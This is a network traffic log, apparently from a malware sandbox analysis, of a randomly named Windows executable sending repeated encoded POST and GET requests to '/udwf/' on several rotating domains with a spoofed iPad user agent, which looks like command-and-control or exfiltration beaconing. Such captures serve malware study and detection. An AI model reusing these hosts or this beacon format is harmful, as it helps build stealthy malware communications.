                                                                                                                            Data Ascii: .imgpic { padding: 25px 0 20px 0 } .contact { margin-left: 50px } .contact p { line-height: 40px } a {
                                                                                                                            Nov 10, 2023 09:30:40.146994114 CET | 327 | IN
                                                                                                                            Data Ascii: color: #666; } .footer-link a:hover { color: #ff8400; } .footer-link span { padding: 0 6px; } </style></head><body> <div clas
                                                                                                                            Nov 10, 2023 09:30:40.475420952 CET | 328 | IN
                                                                                                                            Data Ascii: span></span><a href="https://www.west.cn/ykj/view.asp?domain=633922.com" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div cla


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            48 | 192.168.2.10 | 49764 | 136.243.218.18 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:46.275325060 CET | 330 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.sorenad.com
                                                                                                                            Referer: http://www.sorenad.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=TYN5jIIWuIP8TIQFNfz1oP+c7FBl4/lCQR8TZyNPLiWktu4Zeg/1CmYNY4YnqzQGwyTghxfvffrdL8gH3xCVjuyD/jWA3mpyYZEqpfB0fmlLusnOHgd5xFgvogoaz4su4CtpzL1JqlV1QgOGB7lxpDeVSdMzHPOFAkMGOc6Vkn6y8FGIfQ==
                                                                                                                            Nov 10, 2023 09:30:46.581011057 CET | 332 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:46 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            49 | 192.168.2.10 | 49765 | 136.243.218.18 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:49.108351946 CET | 333 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.sorenad.com
                                                                                                                            Referer: http://www.sorenad.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=TYN5jIIWuIP8cJgFK+z19/+fn1BljPlGQRgTZ29fLRikjvIZfh/1BmYNSYYukTQPwyWfhwjvfePdL9QH3ACKj+yF0DWC5GpyYZEqpfUjfm9LpdXOEBdmt1gsiAoa34sq4CtHzJB3qjZ1Qh+GBqlygDeTWdNBWaT+PEU0ftW3yDP+9QqbYr8RUjFUTIgz/ltuBaQmx3k=
                                                                                                                            Nov 10, 2023 09:30:49.420788050 CET | 334 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:49 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            5 | 192.168.2.10 | 49719 | 91.195.240.123 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:27:59.646814108 CET | 105 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.bellcom.media
                                                                                                                            Referer: http://www.bellcom.media/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=ydvTs2SH7a9ShursLrQH7MOqwqF7frBpoCo0+F5UKtEsD4Y0E7zjg5IQG9v6z0izrzraYWyql/SO0gH8NYJXgbl89rhXLuJAlOMTQeFPcH2ERX5+xTGmyE9MkqDNol12vOjMFfgjlNykkWgyM2Y4EUJxDqY62eeDp2wN6k524JSDVCJlBg==
                                                                                                                            Nov 10, 2023 09:27:59.953897953 CET | 105 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:27:59 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                            50 | 192.168.2.10 | 49766 | 136.243.218.18 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                            Nov 10, 2023 09:30:51.932936907 CET | 336 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.sorenad.com
                                                                                                                            Referer: http://www.sorenad.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=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
Nov 10, 2023 09:30:52.239691019 CET | 337 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:52 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.10 | 49767 | 136.243.218.18 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:30:55.933465958 CET | 338 | OUT | GET /udwf/?G0Yxd2Q=ealZg/ITvpLJU7YFE/TF+8q+uExFybxcdjgzbBdGHgaAn5MnYWXQDBclabNRkiFFmFTfmTH8N/zDLP0J5EOM1vyD30GW5j90MQ==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.sorenad.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:30:56.240942001 CET | 339 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Connection: close
                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                            pragma: no-cache
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 708
                                                                                                                            date: Fri, 10 Nov 2023 08:30:56 GMT
                                                                                                                            vary: User-Agent
                                                                                                                            access-control-allow-origin: *
                                                                                                                            access-control-allow-methods: GET,POST,OPTIONS,DELETE
                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.10 | 49768 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:31:01.942513943 CET | 340 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.westcoastmedia.marketing
                                                                                                                            Referer: http://www.westcoastmedia.marketing/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=aBEO7CI58E9LMDtyMMVe03M0EkmuUtWF5EacuzhXDQExciKC06XxBY8VAY2lyptnZEQv/k7cdNpF4EjusZkGs0zxy7iYCrRi7GGO8NeW7Kl9/QCAc8yCMxoyZkRjJxY28XqKRz91hMX3lLE3STls28JFPMf98XWvS7piIVHzLjCsyPfe7Q==
Nov 10, 2023 09:31:02.248675108 CET | 341 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:31:02 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.10 | 49769 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:31:04.777517080 CET | 342 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.westcoastmedia.marketing
                                                                                                                            Referer: http://www.westcoastmedia.marketing/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=aBEO7CI58E9LNjdyOvtezXM7OEmuBdWB5EWcuxNHDjwxdHuCzLXxCY8VYI2k/JtgZEcn/hbcdLFF4ETuruQBtkzz/biWMLRi7GGO8Ois7Kd9+jqAdeaBPxoxekRjahYy8Xq4R39ThOv3lLU3VClvjMJDR8e4zVD5RbNuNGDFSWvCzazN8iQrPZvCjTkNqOcDYP9UXjc=
Nov 10, 2023 09:31:05.085036039 CET | 342 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:31:04 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.10 | 49770 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:31:07.603514910 CET | 344 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.westcoastmedia.marketing
                                                                                                                            Referer: http://www.westcoastmedia.marketing/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=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
Nov 10, 2023 09:31:07.909116983 CET | 345 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:31:07 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.10 | 49771 | 91.195.240.19 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe

Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:31:12.865883112 CET | 346 | OUT | GET /udwf/?G0Yxd2Q=XDsu41kr/WE9JT9AScR/+1k0JlKiFIG701T/ujNzDh06TiWTrNXnD44RUNnX/KpbWGAw0lPsPrhbwlOTmOIr6R/DwJG4M7kG+w==&pp=dZa4 HTTP/1.1
                                                                                                                            Host: www.westcoastmedia.marketing
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:31:13.204938889 CET | 347 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:31:13 GMT
                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                            transfer-encoding: chunked
                                                                                                                            vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.1.17
                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                            pragma: no-cache
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_la4oIoXL1u9nRopmd8UCD1eLSSfRJulQyjea9uKJHVbCCmEd2l0tePfspS9EWL9y+7/aoQHxtA7MGMAlCcT8Uw==
                                                                                                                            last-modified: Fri, 10 Nov 2023 08:31:13 GMT
                                                                                                                            x-cache-miss-from: parking-698fb476bf-mbx66
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_la4oIoXL1u9nRopmd8UCD1eLSSfRJulQyjea9uKJHVbCCmEd2l0tePfspS9EWL9y+7/aoQHxtA7MGMAlCcT8Uw==><head><meta charset="utf-8"><title>westcoastmedia.marketing&nbsp;-&nbsp;westcoastmedia Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="westcoastmedia.marketing is your first and best source for all of the information you


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.10 | 49720 | 91.195.240.123 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe

Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:02.481271982 CET | 106 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.bellcom.media
                                                                                                                            Referer: http://www.bellcom.media/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Ascii: G0Yxd2Q=ydvTs2SH7a9ShPbsJMMH9sOp96F7WLBtoCs0+AB6KZosDdk0F6zjsZIQOdv/30i8rz34YUWql/GO0lj8NuBUybly7rhVEOJAlOMTQasgcHuESmJ+xxunxE9PzaDNsl1MvOjuFbh0lPakkTcyPnY5TkJ7e6Yq6s3HjFR32xdMq9HbQXl2GSv5ZXqM7BZvb+8x3Vly6Pg=
Nov 10, 2023 09:28:02.789205074 CET | 107 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:28:02 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.10 | 49722 | 91.195.240.123 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe

Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:05.310724020 CET | 140 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.bellcom.media
                                                                                                                            Referer: http://www.bellcom.media/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:28:05.615788937 CET | 141 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                            date: Fri, 10 Nov 2023 08:28:05 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 154
                                                                                                                            server: NginX
                                                                                                                            connection: close
                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.10 | 49723 | 91.195.240.123 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe

Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:08.134658098 CET | 142 | OUT | GET /udwf/?G0Yxd2Q=/fHzvDGB04J+q8b6XJE1xYe30bxweLJnilom5C96GpM+NoY5L9yFqNs9P5GPx0eLkQDxLFeKj8P05w7qGZ9X0/BmwspDAeolpA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.bellcom.media
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Nov 10, 2023 09:28:08.494031906 CET | 143 | IN | HTTP/1.1 200 OK
                                                                                                                            date: Fri, 10 Nov 2023 08:28:08 GMT
                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                            transfer-encoding: chunked
                                                                                                                            vary: Accept-Encoding
                                                                                                                            x-powered-by: PHP/8.1.17
                                                                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                            pragma: no-cache
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_K6T6EgKDNpycVcTI448yZh4Whwi6908edQ5ne9vwqzeDCUwGdehL4WTJXqvsuTowv27KwmYZBTVhLLhotUnz9A==
                                                                                                                            last-modified: Fri, 10 Nov 2023 08:28:08 GMT
                                                                                                                            x-cache-miss-from: parking-698fb476bf-xftqn
                                                                                                                            server: NginX
                                                                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.10 | 49724 | 84.32.84.32 | 80 | C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
Timestamp | kBytes transferred | Direction | Data
Nov 10, 2023 09:28:15.448548079 CET | 173 | OUT | POST /udwf/ HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.tutorwave.online
                                                                                                                            Referer: http://www.tutorwave.online/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 43 38 33 43 47 54 6c 65 32 6f 50 73 78 77 56 35 4c 70 51 53 46 5a 67 52 52 31 7a 79 35 34 52 68 74 52 55 57 4b 75 55 69 74 73 6e 67 75 37 57 32 48 6f 58 63 47 42 38 6a 65 69 7a 45 37 66 69 4e 4f 44 39 75 31 30 64 66 55 62 6f 68 72 33 36 6d 54 43 4c 56 6a 43 62 46 4c 6e 4d 42 43 46 79 74 7a 54 31 48 7a 49 52 79 4e 6a 68 30 34 79 48 62 55 4d 36 77 7a 59 4a 59 48 6b 2b 45 77 6d 59 65 61 6a 65 5a 33 44 32 35 38 42 4f 52 55 77 59 44 66 71 4b 70 52 49 6f 6e 64 39 4b 4d 5a 2f 78 61 55 64 37 36 6a 6c 66 6c 64 32 75 4a 37 43 33 6f 6e 77 3d 3d
